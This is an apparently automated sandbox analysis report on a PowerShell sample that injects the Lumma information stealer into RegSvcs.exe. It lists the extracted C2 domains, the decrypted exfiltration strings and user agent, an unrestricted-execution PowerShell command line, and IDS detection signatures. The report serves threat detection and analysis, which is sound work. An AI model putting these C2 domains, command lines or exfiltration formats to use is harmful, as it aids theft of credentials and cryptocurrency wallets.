Edit tour

Windows Analysis Report
176.113.115.170_3.ps1

Overview

General Information

Sample name:	176.113.115.170_3.ps1
Analysis ID:	1589115
MD5:	2b86583f91a5b84aff4a7232d2a27589
SHA1:	c83c47d772cf4a47389586fe3ab5a14ef4a314e4
SHA256:	83ce3aad9b82d298ec9cd2ad4fc09a807f6416856d1b271a001739ff1639bd4a
Tags:	176-113-115-170bookingdafeytv-1985-nzxps1sputnik-1985-comuser-JAMESWT_MHT
Infos:

Detection

LummaC

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Antivirus detection for URL or domain

Found malware configuration

Multi AV Scanner detection for submitted file

Suricata IDS alerts for network traffic

Yara detected LummaC Stealer

AI detected suspicious sample

C2 URLs / IPs found in malware configuration

Injects a PE file into a foreign processes

LummaC encrypted strings found

Sample uses string decryption to hide its real strings

Writes to foreign memory regions

Contains functionality for read data from the clipboard

Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Contains functionality to read the clipboard data

Contains functionality to record screenshots

Contains long sleeps (>= 3 min)

Creates a process in suspended mode (likely to inject code)

Creates a window with clipboard capturing capabilities

Detected potential crypto function

Enables debug privileges

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Found inlined nop instructions (likely shell or obfuscated code)

Found potential string decryption / allocating functions

IP address seen in connection with other malware

JA3 SSL client fingerprint seen in connection with other malware

May sleep (evasive loops) to hinder dynamic analysis

Queries the volume information (name, serial number etc) of a device

Sigma detected: Change PowerShell Policies to an Insecure Level

Suricata IDS alerts with low severity for network traffic

Uses a known web browser user agent for HTTP communication

Uses code obfuscation techniques (call, push, ret)

Classification

Process Tree

System is w10x64

powershell.exe (PID: 6968 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\176.113.115.170_3.ps1" MD5: 04029E121A0CFA5991749937DD22A1D9)

conhost.exe (PID: 6716 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

RegSvcs.exe (PID: 1976 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe" MD5: 9D352BC46709F0CB5EC974633A0C3C94)

cleanup

Malware Threat Intel

Provided by

Name	Description	Attribution	Blogpost URLs	Link
Lumma Stealer, LummaC2 Stealer	Lumma Stealer (aka LummaC2 Stealer) is an information stealer written in C language that has been available through a Malware-as-a-Service (MaaS) model on Russian-speaking forums since at least August 2022. It is believed to have been developed by the threat actor "Shamel", who goes by the alias "Lumma". Lumma Stealer primarily targets cryptocurrency wallets and two-factor authentication (2FA) browser extensions, before ultimately stealing sensitive information from the victim's machine. Once the targeted data is obtained, it is exfiltrated to a C2 server via HTTP POST requests using the user agent "TeslaBrowser/5.5"." The stealer also features a non-resident loader that is capable of delivering additional payloads via EXE, DLL, and PowerShell.	No Attribution	https://0xmrmagnezi.github.io/malware%20analysis/LummaStealer/ https://0xtoxin-labs.gitbook.io/malware-analysis/malware-analysis/lummac2-breakdown#chrome-extensions-crx https://any.run/cybersecurity-blog/crackedcantil-breakdown/ https://blog.cyble.com/2023/01/06/lummac2-stealer-a-potent-threat-to-crypto-users/ https://blog.sekoia.io/exposing-fakebat-loader-distribution-methods-and-adversary-infrastructure/	https://malpedia.caad.fkie.fraunhofer.de/details/win.lumma

Malware Configuration

Threatname: LummaC

{"C2 url": ["femalsabler.shop", "apporholis.shop", "chipdonkeruz.shop", "crowdwarek.shop", "handscreamny.shop", "robinsharez.shop", "soundtappysk.shop", "letterdrive.shop", "versersleep.shop"], "Build id": "atxOT1--noviy2"}

Yara Signatures

Memory Dumps

Source	Rule	Description	Author	Strings
decrypted.memstr	JoeSecurity_LummaCStealer_2	Yara detected LummaC Stealer	Joe Security

Sigma Signatures

Sigma detected: Change PowerShell Policies to an Insecure Level

Source: Process started

Author: frack113: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\176.113.115.170_3.ps1", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\176.113.115.170_3.ps1", CommandLine|base64offset|contains: z, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 1028, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\176.113.115.170_3.ps1", ProcessId: 6968, ProcessName: powershell.exe

Sigma detected: Non Interactive PowerShell Process Spawned

Source: Process started

Author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\176.113.115.170_3.ps1", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\176.113.115.170_3.ps1", CommandLine|base64offset|contains: z, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 1028, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\176.113.115.170_3.ps1", ProcessId: 6968, ProcessName: powershell.exe

Suricata Signatures

ET JA3 Hash - Possible Malware - Fake Firefox Font Update

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-01-11T10:03:03.074242+0100	2028371	3	Unknown Traffic	192.168.2.5	49704	104.102.49.254	443	TCP

ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (apporholis .shop)

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-01-11T10:03:02.296165+0100	2059035	1	Domain Observed Used for C2 Detected	192.168.2.5	59260	1.1.1.1	53	UDP

ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (chipdonkeruz .shop)

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-01-11T10:03:02.337113+0100	2059037	1	Domain Observed Used for C2 Detected	192.168.2.5	50072	1.1.1.1	53	UDP

ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (crowdwarek .shop)

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-01-11T10:03:02.306956+0100	2059039	1	Domain Observed Used for C2 Detected	192.168.2.5	53253	1.1.1.1	53	UDP

ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (femalsabler .shop)

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-01-11T10:03:02.208511+0100	2059041	1	Domain Observed Used for C2 Detected	192.168.2.5	59870	1.1.1.1	53	UDP

ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (handscreamny .shop)

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-01-11T10:03:02.404561+0100	2059043	1	Domain Observed Used for C2 Detected	192.168.2.5	56988	1.1.1.1	53	UDP

ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (letterdrive .shop)

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-01-11T10:03:02.179488+0100	2059120	1	Domain Observed Used for C2 Detected	192.168.2.5	50683	1.1.1.1	53	UDP

ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (robinsharez .shop)

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-01-11T10:03:02.414338+0100	2059049	1	Domain Observed Used for C2 Detected	192.168.2.5	49978	1.1.1.1	53	UDP

ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (soundtappysk .shop)

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-01-11T10:03:02.196518+0100	2059051	1	Domain Observed Used for C2 Detected	192.168.2.5	49709	1.1.1.1	53	UDP

ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (versersleep .shop)

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-01-11T10:03:02.322082+0100	2059057	1	Domain Observed Used for C2 Detected	192.168.2.5	62283	1.1.1.1	53	UDP

ETPRO MALWARE Win32/Lumma Stealer Steam Profile Lookup

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-01-11T10:03:03.618250+0100	2858666	1	Domain Observed Used for C2 Detected	192.168.2.5	49704	104.102.49.254	443	TCP

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Antivirus detection for URL or domain

Source: letterdrive.shop

Avira URL Cloud: Label: malware

Found malware configuration

Source: 3.2.RegSvcs.exe.400000.0.raw.unpack

Malware Configuration Extractor: LummaC {"C2 url": ["femalsabler.shop", "apporholis.shop", "chipdonkeruz.shop", "crowdwarek.shop", "handscreamny.shop", "robinsharez.shop", "soundtappysk.shop", "letterdrive.shop", "versersleep.shop"], "Build id": "atxOT1--noviy2"}

Multi AV Scanner detection for submitted file

Source: 176.113.115.170_3.ps1

Virustotal: Detection: 35%

Perma Link

AI detected suspicious sample

Source: Submited Sample

Integrated Neural Analysis Model: Matched 99.8% probability

Sample uses string decryption to hide its real strings

Source: 00000003.00000002.2103284293.0000000000400000.00000040.00000400.00020000.00000000.sdmp	String decryptor: robinsharez.shop
Source: 00000003.00000002.2103284293.0000000000400000.00000040.00000400.00020000.00000000.sdmp	String decryptor: handscreamny.shop
Source: 00000003.00000002.2103284293.0000000000400000.00000040.00000400.00020000.00000000.sdmp	String decryptor: chipdonkeruz.shop
Source: 00000003.00000002.2103284293.0000000000400000.00000040.00000400.00020000.00000000.sdmp	String decryptor: versersleep.shop
Source: 00000003.00000002.2103284293.0000000000400000.00000040.00000400.00020000.00000000.sdmp	String decryptor: crowdwarek.shop
Source: 00000003.00000002.2103284293.0000000000400000.00000040.00000400.00020000.00000000.sdmp	String decryptor: apporholis.shop
Source: 00000003.00000002.2103284293.0000000000400000.00000040.00000400.00020000.00000000.sdmp	String decryptor: femalsabler.shop
Source: 00000003.00000002.2103284293.0000000000400000.00000040.00000400.00020000.00000000.sdmp	String decryptor: soundtappysk.shop
Source: 00000003.00000002.2103284293.0000000000400000.00000040.00000400.00020000.00000000.sdmp	String decryptor: letterdrive.shop
Source: 00000003.00000002.2103284293.0000000000400000.00000040.00000400.00020000.00000000.sdmp	String decryptor: lid=%s&j=%s&ver=4.0
Source: 00000003.00000002.2103284293.0000000000400000.00000040.00000400.00020000.00000000.sdmp	String decryptor: TeslaBrowser/5.5
Source: 00000003.00000002.2103284293.0000000000400000.00000040.00000400.00020000.00000000.sdmp	String decryptor: - Screen Resoluton:
Source: 00000003.00000002.2103284293.0000000000400000.00000040.00000400.00020000.00000000.sdmp	String decryptor: - Physical Installed Memory:
Source: 00000003.00000002.2103284293.0000000000400000.00000040.00000400.00020000.00000000.sdmp	String decryptor: Workgroup: -
Source: 00000003.00000002.2103284293.0000000000400000.00000040.00000400.00020000.00000000.sdmp	String decryptor: atxOT1--noviy2

Source: unknown

HTTPS traffic detected: 104.102.49.254:443 -> 192.168.2.5:49704 version: TLS 1.2

Source:

Binary string: #.dll.pdb source: powershell.exe, 00000000.00000002.2090622151.000001BF226A8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.2090570062.000001BF220D0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000000.00000002.2090622151.000001BF23948000.00000004.00000800.00020000.00000000.sdmp

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.ini	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData\Roaming\Microsoft	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData\Roaming	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData	Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4x nop then mov ecx, edx	3_2_0040B2B0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4x nop then cmp dword ptr [edx+ecx*8], 1ED645B4h	3_2_00419840
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4x nop then movzx edx, byte ptr [edi+eax]	3_2_0040A05C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4x nop then cmp dword ptr [edi+edx*8], 53585096h	3_2_00427070
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4x nop then mov dword ptr [esp+3Ch], edx	3_2_0043B870
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4x nop then mov edx, ecx	3_2_0043B870
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4x nop then add ebp, dword ptr [esp+0Ch]	3_2_0042D830
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4x nop then cmp dword ptr [edi+esi*8], 01FCE602h	3_2_0043F0E0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4x nop then mov byte ptr [edi], al	3_2_0041B882
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4x nop then jmp eax	3_2_004418A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4x nop then mov byte ptr [edi], al	3_2_0041B173
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4x nop then cmp dword ptr [esi+edx*8], 53585096h	3_2_0042B170
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4x nop then mov word ptr [eax], cx	3_2_0041A900
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4x nop then mov byte ptr [edi], al	3_2_0041B184
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4x nop then test esi, esi	3_2_0043C9A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4x nop then mov byte ptr [ecx], al	3_2_0041B243
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4x nop then mov byte ptr [esi], cl	3_2_0042EA62
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4x nop then mov eax, dword ptr [edi+0Ch]	3_2_00402210
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4x nop then mov ecx, eax	3_2_0040AA32
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4x nop then movzx eax, byte ptr [ebp+esi-00001458h]	3_2_00425AF0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4x nop then mov ecx, eax	3_2_00428280
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4x nop then movsx eax, byte ptr [esi+ecx]	3_2_0041F2A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4x nop then mov ebx, eax	3_2_00405AB0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4x nop then mov ebp, eax	3_2_00405AB0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4x nop then mov byte ptr [esi], cl	3_2_0042EB5F
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4x nop then mov ebx, dword ptr [edi+04h]	3_2_0042BB00
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4x nop then mov byte ptr [edi], al	3_2_0041BB21
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4x nop then mov dword ptr [esp+14h], 00000000h	3_2_00441B20
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4x nop then mov byte ptr [edi], cl	3_2_0041AB2A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4x nop then movzx ebp, byte ptr [esp+edi+72B923DBh]	3_2_0040C334
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4x nop then movzx edi, byte ptr [esp+edx+72B923DBh]	3_2_0040C3EC
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4x nop then mov ebx, edx	3_2_0042DBF0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4x nop then jmp ecx	3_2_0040D334
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4x nop then cmp dword ptr [esi+edx*8], 53585096h	3_2_00422380
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4x nop then movzx edx, byte ptr [esp+ecx-000000E2h]	3_2_0041BBA0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4x nop then mov dword ptr [ebx], 00000022h	3_2_0042BBA0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4x nop then mov byte ptr [esi], cl	3_2_0042EBA1
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4x nop then mov ecx, eax	3_2_00440BAB
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4x nop then mov byte ptr [esi], cl	3_2_0042EBB3
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4x nop then mov dword ptr [esp+14h], 00000000h	3_2_00441BB0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4x nop then mov dword ptr [esp+14h], 00000000h	3_2_00441C40
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4x nop then mov ecx, eax	3_2_00442470
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4x nop then cmp dword ptr [edi+edx*8], 53585096h	3_2_00426C76
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4x nop then mov eax, edi	3_2_0041C400
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4x nop then mov byte ptr [esi], al	3_2_00417405
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4x nop then movzx esi, byte ptr [esp+edi+17ECFBF3h]	3_2_00417405
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4x nop then mov edx, ecx	3_2_00417405
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4x nop then cmp dword ptr [esi+edx*8], 53585096h	3_2_00414C20
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4x nop then mov dword ptr [ebp-00000248h], 24272637h	3_2_0044042D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4x nop then mov ecx, eax	3_2_0044042D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4x nop then mov byte ptr [edi], cl	3_2_0041B484
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4x nop then mov word ptr [esi], cx	3_2_00427490
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4x nop then cmp dword ptr [edi+edx*8], 53585096h	3_2_00425D6A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4x nop then movzx ebx, byte ptr [edx]	3_2_00438520
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4x nop then cmp dword ptr [ebp+edi*8+00h], 4B884A2Eh	3_2_00442D20
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4x nop then push edi	3_2_0043C5A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4x nop then movzx edx, byte ptr [esp+edi+53BD8A12h]	3_2_0043C5A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4x nop then cmp dword ptr [esi+edx*8], 53585096h	3_2_0042B652
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4x nop then mov byte ptr [edi], cl	3_2_0041B667
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4x nop then mov ecx, dword ptr [0044C548h]	3_2_00418672
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4x nop then mov word ptr [eax], cx	3_2_00409E09
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4x nop then add eax, dword ptr [esp+ecx*4+24h]	3_2_00407620
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4x nop then movzx ecx, word ptr [edi+esi*4]	3_2_00407620
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4x nop then jmp ecx	3_2_0040CEC7
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4x nop then movzx ecx, byte ptr [esp+eax+00000128h]	3_2_00416ED0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4x nop then movzx edx, byte ptr [esp+ecx+3A4EC517h]	3_2_0041BEE1
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4x nop then mov byte ptr [edi], al	3_2_0041AEFF
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4x nop then mov esi, ecx	3_2_00415720
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4x nop then mov ecx, eax	3_2_00415720
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4x nop then movzx ebx, byte ptr [edx+eax-03DAF14Eh]	3_2_0040DFE2
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4x nop then mov byte ptr [eax], cl	3_2_0040DFE2
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4x nop then movzx ecx, byte ptr [esp+ebx+08h]	3_2_00408F90
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4x nop then cmp dword ptr [ebp+edi*8+00h], 0EF2A4EDh	3_2_004427B0

Networking

Suricata IDS alerts for network traffic

Source: Network traffic	Suricata IDS: 2059039 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (crowdwarek .shop) : 192.168.2.5:53253 -> 1.1.1.1:53
Source: Network traffic	Suricata IDS: 2059120 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (letterdrive .shop) : 192.168.2.5:50683 -> 1.1.1.1:53
Source: Network traffic	Suricata IDS: 2059037 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (chipdonkeruz .shop) : 192.168.2.5:50072 -> 1.1.1.1:53
Source: Network traffic	Suricata IDS: 2059041 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (femalsabler .shop) : 192.168.2.5:59870 -> 1.1.1.1:53
Source: Network traffic	Suricata IDS: 2059057 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (versersleep .shop) : 192.168.2.5:62283 -> 1.1.1.1:53
Source: Network traffic	Suricata IDS: 2059051 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (soundtappysk .shop) : 192.168.2.5:49709 -> 1.1.1.1:53
Source: Network traffic	Suricata IDS: 2059035 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (apporholis .shop) : 192.168.2.5:59260 -> 1.1.1.1:53
Source: Network traffic	Suricata IDS: 2059043 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (handscreamny .shop) : 192.168.2.5:56988 -> 1.1.1.1:53
Source: Network traffic	Suricata IDS: 2059049 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (robinsharez .shop) : 192.168.2.5:49978 -> 1.1.1.1:53
Source: Network traffic	Suricata IDS: 2858666 - Severity 1 - ETPRO MALWARE Win32/Lumma Stealer Steam Profile Lookup : 192.168.2.5:49704 -> 104.102.49.254:443

C2 URLs / IPs found in malware configuration

Source: Malware configuration extractor	URLs: femalsabler.shop
Source: Malware configuration extractor	URLs: apporholis.shop
Source: Malware configuration extractor	URLs: chipdonkeruz.shop
Source: Malware configuration extractor	URLs: crowdwarek.shop
Source: Malware configuration extractor	URLs: handscreamny.shop
Source: Malware configuration extractor	URLs: robinsharez.shop
Source: Malware configuration extractor	URLs: soundtappysk.shop
Source: Malware configuration extractor	URLs: letterdrive.shop
Source: Malware configuration extractor	URLs: versersleep.shop

Source: Joe Sandbox View

IP Address: 104.102.49.254 104.102.49.254

Source: Joe Sandbox View

JA3 fingerprint: a0e9f5d64349fb13191bc781f81f42e1

Source: Network traffic

Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:49704 -> 104.102.49.254:443

Source: global traffic

HTTP traffic detected: GET /profiles/76561199724331900 HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Host: steamcommunity.com

Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1

Source: global traffic

Source: RegSvcs.exe, 00000003.00000002.2109848982.0000000000C5E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: Content-Security-Policy: default-src blob: data: https: 'unsafe-inline' 'unsafe-eval'; script-src 'self' 'unsafe-inline' 'unsafe-eval' https://community.fastly.steamstatic.com/ https://cdn.fastly.steamstatic.com/steamcommunity/public/assets/ https://api.steampowered.com/ https://recaptcha.net https://www.google.com/recaptcha/ https://www.gstatic.cn/recaptcha/ https://www.gstatic.com/recaptcha/ https://www.youtube.com/ https://s.ytimg.com; object-src 'none'; connect-src 'self' https://community.fastly.steamstatic.com/ https://store.steampowered.com/ https://checkout.steampowered.com/ wss://community.steam-api.com/websocket/ https://api.steampowered.com/ https://login.steampowered.com/ https://help.steampowered.com/ https://steam.tv/ https://steamcommunity.com/ https://.valvesoftware.com https://.steambeta.net https://*.discovery.beta.steamserver.n equals www.youtube.com (Youtube)
